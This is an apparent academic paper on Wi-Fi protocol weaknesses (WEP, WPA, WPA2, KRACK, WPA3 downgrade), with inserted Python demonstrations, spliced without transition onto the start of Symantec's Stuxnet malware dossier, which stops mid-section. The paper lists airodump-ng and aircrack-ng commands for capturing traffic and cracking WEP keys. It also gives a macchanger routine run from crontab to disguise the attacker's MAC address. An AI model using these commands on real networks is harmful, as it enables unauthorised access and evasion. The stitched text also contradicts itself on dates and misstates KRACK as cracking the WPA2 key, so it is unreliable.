Wired Equivalent Privacy (WEP) is a security protocol which was introduced as part of the IEEE 802.11 standard in 1997. It uses the RC4 encryption algorithm to encrypt the plain text and an unencrypted integrity check value to ensure the integrity of the plain text when it is transmitted from one end to the other. It operates at the data link layer and the physical layer. In 2001 major flaws such as short IV size, keystream reuse which proved that data transmitted can be easily captured and
http://xisdxjxsu.asia VOLUME 18 ISSUE 5 108 -112



tampered with. Because of these flaws WPA was introduced to remove the vulnerability of weak encryption techniques.

2. Wireless Protected Access (WPA)

WPA was created as a WiFi security protocol. It is similar to WEP, but it encrypts data using the Temporal Key Integrity Protocol (TKIP). To avoid the attacks that WEP allows, TKIP provides a new 128-bit key for each packet. Users can upgrade to TKIP from earlier WLAN equipment without changing hardware because TKIP comprises several methods that encapsulate WEP. A Message Integrity Check (MIC), an IV sequencing mechanism, a per-packet key mixing function, and a re-keying mechanism are four additional algorithms included in TKIP to boost key strength.

A per-packet key mixing mechanism is used to improve cryptographic strength. A re-keying approach is employed to generate a new key every 10,000 packets. A hashing-based initialization-vector sequencing technique is used. WPA uses TKIP, which dynamically changes the encryption key used by the computers, preventing intruders from matching the secure network's encryption key. A message authentication code (MAC) is a cryptographic way of confirming that communications have not been tampered with. WPA uses the Extensible Authentication Protocol (EAP) to authenticate computers rather than relying exclusively on the plaintext of their MAC address.

3. Wireless Protected Access 2 (WPA2)

Although Wi-Fi signals are broadcast in the air and can be readily intercepted, encrypting wireless data is critical for security. WPA2 is an 802.11 wireless security standard that employs 128-bit encryption and passwords to prevent unauthorized access to critical information.

This protocol uses a single pre-shared key (PSK) that all devices and the Access Point share for network authentication. The PSK can be 8 to 63 characters long. An attacker can gain access to the network if he discovers this one-of-a-kind PSK. Every device derives and maintains a PMK from the PSK and the AP name until one of them changes. When a client attempts to connect to an authenticator, the 4-way handshake procedure begins, and a Pairwise Transient Key (PTK) is generated, which is used to encrypt data between a client and an access point and is changed at least once every 65,535 packets.

Pairwise Master Key Generation

Using the function below, all devices calculate the PMK from the PSK. The data is encoded using HMAC-SHA1 by the key derivation function PBKDF2. These routines are used to reduce vulnerability to brute force attacks because of their high computational cost.

PMK = PBKDF2(HMAC-SHA1, PSK, SSID, 4096, 256)

B. Comparison of Different WLAN Protocols

C. Vulnerability/Weaknesses of WLAN Protocols

1. Vulnerability of WEP

As the IV is short, i.e. 24 bits, there can be cases when two packets are captured using the same IV. This is the short-IV-size vulnerability. Also, as there is no particular way to generate the IV, there is a possibility that the WiFi network uses the same IV for a long period of time. This is the keystream reuse vulnerability. When plain text is associated with the unencrypted Integrity Check Value, it leads to brute force attacks by the attackers.

2. Vulnerability of WPA/WPA2-PSK

WPA is similar to WEP, but it uses the Temporal Key Integrity Protocol (TKIP) to strengthen the encryption. TKIP encapsulates WEP using various algorithms. WPA2 on the other hand uses the Advanced Encryption Standard. Communication of packets between the client and authenticator occurs using a 4-way handshake, which takes place between client and AP whenever a client tries to connect to an AP. The PMK is calculated using the PBKDF2 hashing technique. By entering the SSID, a self-created


passphrase, and the SSID length into this function, the attacker can build a hashed key and compare it to the captured hashed key. The AP and client verify that the credentials (WPA key) used to initiate the connection are correct and then exchange the key to encrypt all the traffic from that point onwards.

The cryptographic key is installed whenever the client receives the third handshake message. The 4-way handshake's weak point lies at this stage, where messages might be lost or dropped. When the AP fails to receive message 4 (the acknowledgement message) from the client, it re-transmits message 3 and lets the client receive it several times, reinstalling the same cryptographic key each time the third message is received. The attack takes place here.

3. Vulnerability of WPA3

WPA3 shows a vulnerability in its Dragonfly handshake, where Dragonfly is the mechanism through which the user authenticates itself. It uses strong elliptic curves for encryption, but attackers can force it to use weaker curves. Another vulnerability is a side channel attack, which exploits unprotected code, i.e. an if-then-else branch in the Dragonfly algorithm, to guess the password generation method.

D. Attacks on WLAN protocols

1. Attack on WEP

One can capture a packet and inject it into the traffic to force the access point to create a new packet with a new IV, and continue to do so until there are two packets using the same IV. Using the short-IV-size vulnerability one can figure out the secret key used in encrypting and decrypting the plain text.

1.1 Sniff all packets from the target Access Point using the command "airodump-ng --channel 2 --bssid <MAC ADDRESS> --write packets wlan0". It will capture all packets and store them in .cap file format.

Figure 1. Sniff all the packets from the target AP

1.2 Crack the WEP key from the captured packets using the command "aircrack-ng <filename of stored packets>".

Figure 2. Cracking WEP key from the captured packets

2. Attack on WPA/WPA2

2.1 The PTK is generated using the PMK and the PBKDF2 hashing function; this is the loophole for attackers to exploit, as the handshake data is sent in an unencrypted format. The passphrase, which can be computed via a dictionary attack once a solid 4-way handshake has been captured, is the attacker's lone unknown value in computing the PMK. There is no cryptographic flaw in WPA2, thus there is no other method to reverse engineer that key.

Fig 3. Cracking passphrase from the captured four-way handshake

2.3 KRACK for WPA2 (Key Reinstallation Attack)

It is used to get around the WPA2 protocol's weakness. As previously mentioned, the attacker can impersonate the AP by re-transmitting message 3 multiple times. When the client attempts to reconnect to the AP, the attacker can force it to connect to the phoney AP. It can operate as a middleman. Attackers can crack the passphrase with the captured handshake using brute force and dictionary attacks.
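The key hierarchy behind sections A.3, D.2.1 and D.2.3, as an added example that is not code from the paper: the PMK is derived by exactly the PBKDF2 formula given above, the PTK by the IEEE 802.11i PRF-512 (taken from the standard, not stated in the paper), and a small client model shows why a replayed message 3 makes an unpatched client reuse packet numbers while a patched client does not. The passphrase, SSID, MAC addresses and nonces are constructed.

```python
"""Added example, not code from the paper: WPA2-PSK key hierarchy plus a
client model of the state that KRACK abuses.

PMK = PBKDF2(HMAC-SHA1, PSK, SSID, 4096, 256) is the formula in section A.3.
PTK derivation follows IEEE 802.11i PRF-512 (assumed from the standard).
Passphrase, SSID, MAC addresses and nonces below are constructed values."""
import hashlib
import hmac
import os


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # PBKDF2-HMAC-SHA1, 4096 iterations, 32-byte (256-bit) output.
    # The iteration count is what makes every passphrase guess expensive.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i)
    # for i = 0, 1, 2, 3 (80 bytes) and keep the first 64 bytes.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # AA = authenticator (AP) MAC, SPA = supplicant (client) MAC. Both sides sort
    # the inputs so they compute the same PTK; only the PMK is secret, the nonces
    # and MACs travel in clear in messages 1 and 2 of the handshake.
    # PTK layout: KCK = [0:16] (handshake MIC key), KEK = [16:32], TK = [32:48].
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


class Supplicant:
    """Client side of the 4-way handshake, reduced to the state KRACK targets.

    vulnerable=True reproduces pre-patch behaviour: every copy of message 3
    re-installs the PTK and resets the per-key packet number to zero, so data
    frames sent after a retransmission reuse CCMP nonces under the same key.
    vulnerable=False installs the key once and only re-acknowledges later copies."""

    def __init__(self, pmk: bytes, spa: bytes, aa: bytes, vulnerable: bool = False):
        self.pmk, self.spa, self.aa, self.vulnerable = pmk, spa, aa, vulnerable
        self.snonce = os.urandom(32)
        self.ptk = None
        self.installed = False
        self.packet_number = 0  # CCMP nonce counter; must never repeat under one TK

    def on_message1(self, anonce: bytes) -> bytes:
        # Message 1 carries ANonce; the client can now derive the PTK.
        self.ptk = derive_ptk(self.pmk, self.aa, self.spa, anonce, self.snonce)
        return self.snonce  # message 2 carries SNonce (MIC omitted in this model)

    def on_message3(self) -> str:
        # Message 3 tells the client to install the PTK. The AP retransmits it
        # when message 4 is lost, and the client must answer every copy.
        if self.vulnerable or not self.installed:
            self.installed = True
            self.packet_number = 0  # fresh key: packet number restarts at 0
        return "message4"

    def send_data(self) -> int:
        # Returns the packet number the next data frame would carry.
        self.packet_number += 1
        return self.packet_number


def simulate(vulnerable: bool) -> list:
    """Deliver message 3 twice (the second copy as a replay) around two data
    frames each and return the packet numbers used; duplicates mean nonce reuse."""
    pmk = derive_pmk("correct horse battery", "TestNet")  # constructed inputs
    aa, spa = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
    client = Supplicant(pmk, spa, aa, vulnerable=vulnerable)
    client.on_message1(os.urandom(32))
    client.on_message3()
    used = [client.send_data(), client.send_data()]
    client.on_message3()  # replayed message 3
    used += [client.send_data(), client.send_data()]
    return used


if __name__ == "__main__":
    print("PMK(password, IEEE) =", derive_pmk("password", "IEEE").hex())
    print("vulnerable client packet numbers:", simulate(True))   # [1, 2, 1, 2]
    print("patched client packet numbers:  ", simulate(False))  # [1, 2, 3, 4]
```

The PMK printed for passphrase "password" and SSID "IEEE" matches the IEEE 802.11i Annex H test vector, which is a quick way to confirm a PBKDF2 implementation before relying on it.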


Fig 4. Cracking passphrase using KRACK
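Returning to the WEP weakness of sections C.1 and D.1, an added example that is not from the paper: it builds WEP-style frame bodies with a toy 40-bit key, finds a repeated IV in a set of frames, and shows that two ciphertexts under one IV XOR to the XOR of their plaintexts with no key involved. The key, plaintexts and frames are constructed; nothing is captured from a network.

```python
"""Added example, not code from the paper: detecting WEP IV reuse and showing
why it matters. WEP sends the 24-bit IV in clear at the front of each frame
body and seeds RC4 with IV || key, so two frames with the same IV are
encrypted with the same keystream. Key, plaintexts and frames are constructed."""
import math
from collections import defaultdict

IV_SPACE = 1 << 24  # 24-bit IV


def rc4(key: bytes, length: int) -> bytes:
    # Plain RC4 keystream generator (KSA + PRGA); enough for this demonstration.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    # Frame body = IV (3 bytes) || KeyID byte || (plaintext XOR RC4(IV || key)).
    # The ICV (CRC-32 over the plaintext) is omitted; it is not needed here.
    if len(iv) != 3:
        raise ValueError("WEP IV is exactly 3 bytes")
    ks = rc4(iv + key, len(plaintext))
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_iv(frame_body: bytes) -> int:
    # The IV is the first three bytes; byte order does not matter for matching.
    if len(frame_body) < 4:
        raise ValueError("frame body too short for a WEP header")
    return int.from_bytes(frame_body[:3], "big")


def find_iv_reuse(frames) -> dict:
    """Map each IV seen more than once to the indexes of the frames using it."""
    by_iv = defaultdict(list)
    for idx, body in enumerate(frames):
        by_iv[wep_iv(body)].append(idx)
    return {iv: idxs for iv, idxs in by_iv.items() if len(idxs) > 1}


def xor_of_plaintexts(frame_a: bytes, frame_b: bytes) -> bytes:
    """With equal IVs the keystreams cancel: C1 xor C2 == P1 xor P2, no key needed.
    This is the keystream-reuse weakness: knowing one plaintext reveals the other."""
    if wep_iv(frame_a) != wep_iv(frame_b):
        raise ValueError("frames use different IVs, so their keystreams differ")
    return bytes(a ^ b for a, b in zip(frame_a[4:], frame_b[4:]))


def frames_until_likely_repeat() -> int:
    """Birthday bound for random 24-bit IVs: a repeat is more likely than not
    after about sqrt(2 ln 2 * 2^24) frames, a few thousand rather than 16 million."""
    return math.ceil(math.sqrt(2 * math.log(2) * IV_SPACE))


# Constructed sample: a 40-bit key and three frames, two of which share an IV.
KEY = bytes.fromhex("0102030405")
P1 = b"GET /index.html "
P2 = b"POST /login.php "
SAMPLE_FRAMES = [
    wep_encrypt(b"\x00\x00\x01", KEY, P1),
    wep_encrypt(b"\x00\x00\x02", KEY, b"some other frame"),
    wep_encrypt(b"\x00\x00\x01", KEY, P2),  # IV 000001 reused
]


if __name__ == "__main__":
    dup = find_iv_reuse(SAMPLE_FRAMES)
    print("reused IVs:", {hex(iv): idxs for iv, idxs in dup.items()})
    a, b = SAMPLE_FRAMES[0], SAMPLE_FRAMES[2]
    expected = bytes(x ^ y for x, y in zip(P1, P2))
    print("C1^C2 == P1^P2:", xor_of_plaintexts(a, b) == expected)
    print("frames until an IV repeat is likely:", frames_until_likely_repeat())
```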

3. Attack on WPA3

Downgrade Attack - As some devices do not support the new protocol, transition mode can be exploited in two different ways. The first is to modify the beacons, as a man in the middle, so that a WPA3-enabled router appears to support only WPA2. The second, if the SSID of the targeted WPA3 network is known, is to forge a man-in-the-middle access point that redirects every WPA3 connection request to a WPA2 access point. Once it acts as WPA2, the attacker can exploit the four-way handshake of WPA2 as explained in the attacks on WPA2 above.

E. MAC SPOOFING

To protect the individual's privacy, the MAC address should be anonymous. Therefore MAC spoofing is done before performing any kind of attack on the above mentioned protocols.

Algorithm to spoof the MAC address:

1 ifconfig wlan0 down (bring the interface down)
2 macchanger -a wlan0 (change the MAC address)
3 ifconfig wlan0 up (bring the interface up)

Store this code in the crontab so that whenever the system starts the code executes itself and the MAC address gets changed automatically.

Figure 5: MAC Spoofing Script

Pseudo-code to spoof the MAC address using macchanger.

Fig 6. Pseudo Code for MacChanger

VI. CONCLUSION

WEP was introduced in 1999; it has the vulnerability of a short IV size, which leads to cracking of the WEP key. WPA was introduced in 2003 and uses TKIP, which dynamically changes the key the system uses; in the case of WEP the key was static. Later, in 2004, WPA2 was introduced to mitigate the chances of the brute force attacks seen in WPA by using Advanced Encryption Standard techniques. As the key in WPA2 can be cracked using the KRACK attack, in 2018 the WPA3 protocol was introduced, which has a different and longer key size compared to the other protocols. WPA3 also uses a simultaneous authentication method. Still, some downgrade attacks can be performed on WPA3, as described above. Every protocol has some vulnerabilities which lead to cracking of the password for different WiFi networks. These are mitigated as soon as they are identified.

AUTHORS

First Author – Sandesh Jain, Department of Information Technology, Delhi Technological University, Delhi, India, [email protected]

Second Author – Sarthak Pruthi, Department of Information Technology, Delhi Technological University, Delhi, India, [email protected]

Third Author – Vivek Yadav, Department of Information Technology, Delhi Technological University, Delhi, India, [email protected]

Correspondence Author – Dr. Kapil Sharma, Head of Department of Information Technology, Delhi Technological University, Delhi, India, [email protected]



Security Response

W32.Stuxnet Dossier
Version 1.4 (February 2011)

Nicolas Falliere, Liam O Murchu, and Eric Chien

While the bulk of the analysis is complete, Stuxnet is an incredibly large and complex threat. The authors expect to make revisions to this document shortly after release as new information is uncovered or may be publicly disclosed. This paper is the work of numerous individuals on the Symantec Security Response team over the last three months well beyond the cited authors. Without their assistance, this paper would not be possible.

Contents
Introduction ........................................ 1
Executive Summary ................................... 2
Attack Scenario ..................................... 3
Timeline ............................................ 4
Infection Statistics ................................ 5
Stuxnet Architecture ............................... 12
Installation ....................................... 16
Load Point ......................................... 20
Command and Control ................................ 21
Windows Rootkit Functionality ...................... 24
Stuxnet Propagation Methods ........................ 25
Modifying PLCs ..................................... 36
Payload Exports .................................... 50
Payload Resources .................................. 51
Variants ........................................... 53
Summary ............................................ 55
Appendix A ......................................... 56
Appendix B ......................................... 58
Appendix C ......................................... 59
Revision History ................................... 68

Introduction

W32.Stuxnet has gained a lot of attention from researchers and media recently. There is good reason for this. Stuxnet is one of the most complex threats we have analyzed. In this paper we take a detailed look at Stuxnet and its various components and particularly focus on the final goal of Stuxnet, which is to reprogram industrial control systems. Stuxnet is a large, complex piece of malware with many different components and functionalities. We have already covered some of these components in our blog series on the topic. While some of the information from those blogs is included here, this paper is a more comprehensive and in-depth look at the threat.

Stuxnet is a threat that was primarily written to target an industrial control system or set of similar systems. Industrial control systems are used in gas pipelines and power plants. Its final goal is to reprogram industrial control systems (ICS) by modifying code on programmable logic controllers (PLCs) to make them work in a manner the attacker intended and to hide those changes from the operator of the equipment. In order to achieve this goal the creators amassed a vast array of components to increase their chances of success. This includes zero-day exploits, a Windows rootkit, the first ever PLC rootkit, antivirus evasion techniques, complex process injection and hooking code, network infection routines, peer-to-peer updates, and a command and control interface. We take a look at each of the different components of Stuxnet to understand how the threat works in detail while keeping in mind that the ultimate goal of the threat is the most interesting and relevant part of the threat.

Executive Summary
Stuxnet is a threat targeting a specific industrial control system likely in Iran, such as a gas pipeline or power
plant. The ultimate goal of Stuxnet is to sabotage that facility by reprogramming programmable logic controllers
(PLCs) to operate as the attackers intend them to, most likely out of their specified boundaries.

Stuxnet was discovered in July, but is confirmed to have existed at least one year prior and likely even before. The majority of infections were found in Iran. Stuxnet contains many features such as:
• Self-replicates through removable drives exploiting a vulnerability allowing auto-execution: Microsoft Windows Shortcut ‘LNK/PIF’ Files Automatic File Execution Vulnerability (BID 41732).
• Spreads in a LAN through a vulnerability in the Windows Print Spooler: Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability (BID 43073).
• Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (BID 31874).
• Copies and executes itself on remote computers through network shares.
• Copies and executes itself on remote computers running a WinCC database server.
• Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is loaded.
• Updates itself through a peer-to-peer mechanism within a LAN.
• Exploits a total of four unpatched Microsoft vulnerabilities, two of which are the previously mentioned vulnerabilities used for self-replication and the other two are escalation of privilege vulnerabilities that have yet to be disclosed.
• Contacts a command and control server that allows the hacker to download and execute code, including updated versions.
• Contains a Windows rootkit that hides its binaries.
• Attempts to bypass security products.
• Fingerprints a specific industrial control system and modifies code on the Siemens PLCs to potentially sabotage the system.
• Hides modified code on PLCs, essentially a rootkit for PLCs.


Attack Scenario
The following is a possible attack scenario. It is only speculation driven by the technical features of Stuxnet.

Industrial control systems (ICS) are operated by specialized assembly-like code on programmable logic controllers (PLCs). The PLCs are often programmed from Windows computers not connected to the Internet or even the internal network. In addition, the industrial control systems themselves are also unlikely to be connected to the Internet.

First, the attackers needed to conduct reconnaissance. As each PLC is configured in a unique manner, the attackers would first need the ICS’s schematics. These design documents may have been stolen by an insider or even retrieved by an early version of Stuxnet or other malicious binary. Once attackers had the design documents and potential knowledge of the computing environment in the facility, they would develop the latest version of Stuxnet. Each feature of Stuxnet was implemented for a specific reason and for the final goal of potentially sabotaging the ICS.

Attackers would need to set up a mirrored environment that would include the necessary ICS hardware, such as PLCs, modules, and peripherals in order to test their code. The full cycle may have taken six months and five to ten core developers not counting numerous other individuals, such as quality assurance and management.

In addition, their malicious binaries contained driver files that needed to be digitally signed to avoid suspicion. The attackers compromised two digital certificates to achieve this task. The attackers would have needed to obtain the digital certificates from someone who may have physically entered the premises of the two companies and stolen them, as the two companies are in close physical proximity.

To infect their target, Stuxnet would need to be introduced into the target environment. This may have occurred by infecting a willing or unknowing third party, such as a contractor who perhaps had access to the facility, or an insider. The original infection may have been introduced by removable drive.

Once Stuxnet had infected a computer within the organization it began to spread in search of Field PGs, which are typical Windows computers but used to program PLCs. Since most of these computers are non-networked, Stuxnet would first try to spread to other computers on the LAN through a zero-day vulnerability, a two year old vulnerability, infecting Step 7 projects, and through removable drives. Propagation through a LAN likely served as the first step and propagation through removable drives as a means to cover the last and final hop to a Field PG that is never connected to an untrusted network.

While attackers could control Stuxnet with a command and control server, as mentioned previously the key computer was unlikely to have outbound Internet access. Thus, all the functionality required to sabotage a system was embedded directly in the Stuxnet executable. Updates to this executable would be propagated throughout the facility through a peer-to-peer method established by Stuxnet.

When Stuxnet finally found a suitable computer, one that ran Step 7, it would then modify the code on the PLC. These modifications likely sabotaged the system, which was likely considered a high value target due to the large resources invested in the creation of Stuxnet.

Victims attempting to verify the issue would not see any rogue PLC code as Stuxnet hides its modifications.

While their choice of using self-replication methods may have been necessary to ensure they’d find a suitable Field PG, they also caused noticeable collateral damage by infecting machines outside the target organization. The attackers may have considered the collateral damage a necessity in order to effectively reach the intended target. Also, the attackers likely completed their initial attack by the time they were discovered.


Timeline

Table 1: W32.Stuxnet Timeline

Date                 Event
November 20, 2008    Trojan.Zlob variant found to be using the LNK vulnerability only later identified in Stuxnet.
April, 2009          Security magazine Hakin9 releases details of a remote code execution vulnerability in the Printer Spooler service. Later identified as MS10-061.
June, 2009           Earliest Stuxnet sample seen. Does not exploit MS10-046. Does not have signed driver files.
January 25, 2010     Stuxnet driver signed with a valid certificate belonging to Realtek Semiconductor Corps.
March, 2010          First Stuxnet variant to exploit MS10-046.
June 17, 2010        Virusblokada reports W32.Stuxnet (named RootkitTmphider). Reports that it’s using a vulnerability in the processing of shortcuts/.lnk files in order to propagate (later identified as MS10-046).
July 13, 2010        Symantec adds detection as W32.Temphid (previously detected as Trojan Horse).
July 16, 2010        Microsoft issues Security Advisory for “Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198)” that covers the vulnerability in processing shortcuts/.lnk files. Verisign revokes Realtek Semiconductor Corps certificate.
July 17, 2010        Eset identifies a new Stuxnet driver, this time signed with a certificate from JMicron Technology Corp.
July 19, 2010        Siemens report that they are investigating reports of malware infecting Siemens WinCC SCADA systems. Symantec renames detection to W32.Stuxnet.
July 20, 2010        Symantec monitors the Stuxnet Command and Control traffic.
July 22, 2010        Verisign revokes the JMicron Technology Corps certificate.
August 2, 2010       Microsoft issues MS10-046, which patches the Windows Shell shortcut vulnerability.
August 6, 2010       Symantec reports how Stuxnet can inject and hide code on a PLC affecting industrial control systems.
September 14, 2010   Microsoft releases MS10-061 to patch the Printer Spooler Vulnerability identified by Symantec in August. Microsoft report two other privilege escalation vulnerabilities identified by Symantec in August.
September 30, 2010   Symantec presents at Virus Bulletin and releases comprehensive analysis of Stuxnet.


Infection Statistics
On July 20, 2010 Symantec set up a system to monitor traffic to the Stuxnet command and control (C&C) servers. This allowed us to observe rates of infection and identify the locations of infected computers, ultimately working with CERT and other organizations to help inform infected parties. The system only identified command and control traffic from computers that were able to connect to the C&C servers. The data sent back to the C&C servers is encrypted and includes data such as the internal and external IP address, computer name, OS version, and if it’s running the Siemens SIMATIC Step 7 industrial control software.

As of September 29, 2010, the data has shown that there are approximately 100,000 infected hosts. The following graph shows the number of unique infected hosts by country:
Figure 1

Infected Hosts

The following graph shows the number of infected organizations by country based on WAN IP addresses:
Figure 2

Infected Organizations (By WAN IP)


We have observed over 40,000 unique external IP addresses, from over 155 countries. Looking at the percentage of infected hosts by country shows that approximately 60% of infected hosts are in Iran:
Figure 3

Geographic Distribution of Infections

Stuxnet aims to identify those hosts which have the Siemens Step 7 software installed. The following chart
shows the percentage of infected hosts by country with the Siemens software installed.
Figure 4

Percentage of Stuxnet infected Hosts with Siemens Software installed

Looking at newly infected IP addresses per day, on August 22 we observed that Iran was no longer reporting new
infections. This was most likely due to Iran blocking outward connections to the command and control servers,
rather than a drop-off in infections.


Figure 5

Rate of Stuxnet infection of new IPs by Country

The concentration of infections in Iran likely indicates that this was the initial target for infections and was where infections were initially seeded. While Stuxnet is a targeted threat, the use of a variety of propagation techniques (which will be discussed later) has meant that Stuxnet has spread beyond the initial target. These additional infections are likely to be “collateral damage”—unintentional side-effects of the promiscuous initial propagation methodology utilized by Stuxnet. While infection rates will likely drop as users patch their computers against the vulnerabilities used for propagation, worms of this nature typically continue to be able to propagate via unsecured and unpatched computers.

By February 2011, we had gathered 3,280 unique samples representing three different variants. As described in
the Configuration Data Block section, Stuxnet records a timestamp, along with other system information, within
itself each time a new infection occurs. Thus, each sample has a history of every computer that was infected,
including the first infection. Using this data, we are able to determine:
• Stuxnet was a targeted attack on five different organizations, based on the recorded computer domain name.
• 12,000 infections can be traced back to these 5 organizations
• Three organizations were targeted once, one was targeted twice, and another was targeted three times.
• Domain A was targeted twice (Jun 2009 and Apr 2010).
• The same computer appears to have been infected each time.
• Domain B was targeted three times (Jun 2009, Mar 2010, and May 2010).
• Domain C was targeted once (Jul 2009).
• Domain D was targeted once (Jul 2009).
• Domain E appears to have been targeted once (May 2010), but had three initial infections. (I.e., the same
initially infected USB key was inserted into three different computers.)
• 12,000 infections originated from these initial 10 infections.
• 1,800 different domain names were recorded.
• Organizations were targeted in June 2009, July 2009, March 2010, April 2010, and May 2010.
• All targeted organizations have a presence in Iran.
• The shortest span between compile time and initial infection was 12 hours.
• The longest span between compile time and initial infection was 28 days.
• The average span between compile time and initial infection was 19 days.
• The median span between compile time and initial infection was 26 days.
Note any timing information could be incorrect due to time zones or incorrectly set system times.


The following table provides details on the initial targets.


Table 2: Attack Waves Against the Initial Targets

Attack Wave     Site       Compile Time              Infection Time            Time to Infect
Attack Wave 1   Domain A   June 22, 2009 16:31:47    June 23, 2009 4:40:16     0 days 12 hours
Attack Wave 1   Domain B   June 22, 2009 16:31:47    June 28, 2009 23:18:14    6 days 6 hours
Attack Wave 1   Domain C   June 22, 2009 16:31:47    July 7, 2009 5:09:28      14 days 12 hours
Attack Wave 1   Domain D   June 22, 2009 16:31:47    July 19, 2009 9:27:09     26 days 16 hours
Attack Wave 2   Domain B   March 1, 2010 5:52:35     March 23, 2010 6:06:07    22 days 0 hours
Attack Wave 3   Domain A   April 14, 2010 10:56:22   April 26, 2010 9:37:36    11 days 22 hours
Attack Wave 3   Domain E   April 14, 2010 10:56:22   May 11, 2010 6:36:32      26 days 19 hours
Attack Wave 3   Domain E   April 14, 2010 10:56:22   May 11, 2010 11:45:53     27 days 0 hours
Attack Wave 3   Domain E   April 14, 2010 10:56:22   May 11, 2010 11:46:10     27 days 0 hours
Attack Wave 3   Domain B   April 14, 2010 10:56:22   May 13, 2010 5:02:23      28 days 18 hours

This graph shows the time required after compilation to the first infection.
Figure 6

Days Before Infection

The following is a graph that shows the clusters of infections resulting from the 10 different initial infections.
Each infection is a black circle. The red circles represent the variant used. The other colored circles represent the
initial infection with each initial domain having its own color (green, yellow, blue, purple, and orange).

Figure 7

Clusters of Infections Based on Initial Infections

There are a total of 10 clusters representing 10 initial infections. The attack on Domain B in March 2010 spread
the most successfully. Early attacks in June 2009 show the fewest infections; however, these numbers are
skewed because of the low number of June 2009 samples that were recovered.

The following picture shows a zoomed-in view of the lower right of the image. This cluster is the attack on
Domain E with the initial infection time of 2010/05/11 11:46:10 with the April 2010 variant.
Figure 8

Domain E Attack (detail)

You can see that the graph primarily has linear branches such that a single infection does not infect many
computers, but only a single computer. While this is partially due to rate-limiting code within Stuxnet—for
example, a USB infection will delete itself from the USB key after the third infection—a larger influencer may be
the limited number of samples that were recovered. Additional samples would likely yield many more sub-branches.
Stuxnet’s propagation mechanisms are all LAN based and thus, the final target must be assumed in close network
proximity to the initial seeded targets. Nevertheless, with 1,800 different computer domains out of 12,000
infections, Stuxnet clearly escaped the original organizations due to collaboration with partner organizations.

Of the approximately 12,000 infections, the chart in figure 9 shows which variants resulted in the most
infections.

Figure 9
Variant Infection Distribution

The March 2010 variant accounts for 69% of all infections. Thus, the March 2010 variant may have been seeded
more successfully. Note the single targeted organization in March 2010 was also targeted in June 2009 and in
April 2010 and neither of those other seeded attempts resulted in as many infections as in March. While smaller
infection rates for the June 2009 variant would be expected since it had fewer replication methods, the April 2010
variant is almost identical to the March 2010 variant. Thus, either the different seed within the same
organization resulted in significantly different rates of spread (e.g., seeding in a computer in a department with
less computer-security restrictions) or the data is skewed due to the small percentage of samples recovered.

Stuxnet Architecture
Organization
Stuxnet has a complex architecture that is worth outlining before continuing with our analysis.

The heart of Stuxnet consists of a large .dll file that contains many different exports and resources. In addition to
the large .dll file, Stuxnet also contains two encrypted configuration blocks.

The dropper component of Stuxnet is a wrapper program that contains all of the above components stored inside
itself in a section named “stub”. This stub section is integral to the working of Stuxnet. When the threat is
executed, the wrapper extracts the .dll file from the stub section, maps it into memory as a module, and calls one
of the exports.

A pointer to the original stub section is passed to this export as a parameter. This export in turn will extract the
.dll file from the stub section, which was passed as a parameter, map it into memory and call another different
export from inside the mapped .dll file. The pointer to the original stub section is again passed as a parameter.
This occurs continuously throughout the execution of the threat, so the original stub section is continuously
passed around between different processes and functions as a parameter to the main payload. In this way every
layer of the threat always has access to the main .dll and the configuration blocks.

In addition to loading the .dll file into memory and calling an export directly, Stuxnet also uses another technique
to call exports from the main .dll file. This technique is to read an executable template from its own resources,
populate the template with appropriate data, such as which .dll file to load and which export to call, and then to
inject this newly populated executable into another process and execute it. The newly populated executable
template will load the original .dll file and call whatever export the template was populated with.

Although the threat uses these two different techniques to call exports in the main .dll file, it should be clear
that all the functionality of the threat can be ascertained by analyzing all of the exports from the main .dll file.

Exports
As mentioned above, the main .dll file contains all of the code to control the worm. Each export from this .dll
file has a different purpose in controlling the threat as outlined in table 3.

Table 3
DLL Exports

Export #  Function
1         Infect connected removable drives, starts RPC server
2         Hooks APIs for Step 7 project file infections
4         Calls the removal routine (export 18)
5         Verifies if the threat is installed correctly
6         Verifies version information
7         Calls Export 6
9         Updates itself from infected Step 7 projects
10        Updates itself from infected Step 7 projects
14        Step 7 project file infection routine
15        Initial entry point
16        Main installation
17        Replaces Step 7 DLL
18        Uninstalls Stuxnet
19        Infects removable drives
22        Network propagation routines
24        Check Internet connection
27        RPC Server
28        Command and control routine
29        Command and control routine
31        Updates itself from infected Step 7 projects
32        Same as 1

Resources
The main .dll file also contains many different resources that the exports above use in the course of controlling
the worm. The resources vary from full .dll files to template executables to configuration files and exploit
modules.

Both the exports and resources are discussed in the sections below.
Table 4

DLL Resources
Resource ID Function
201 MrxNet.sys load driver, signed by Realtek
202 DLL for Step 7 infections
203 CAB file for WinCC infections
205 Data file for Resource 201
207 Autorun version of Stuxnet
208 Step 7 replacement DLL
209 Data file (%windows%\help\winmic.fts)
210 Template PE file used for injection
221 Exploits MS08-067 to spread via SMB.
222 Exploits MS10-061 Print Spooler Vulnerability
231 Internet connection check
240 LNK template file used to build LNK exploit
241 USB Loader DLL ~WTR4141.tmp
242 MRxnet.sys rootkit driver
250 Exploits Windows Win32k.sys Local Privilege Escalation (MS10-073)

Bypassing Behavior Blocking When Loading DLLs

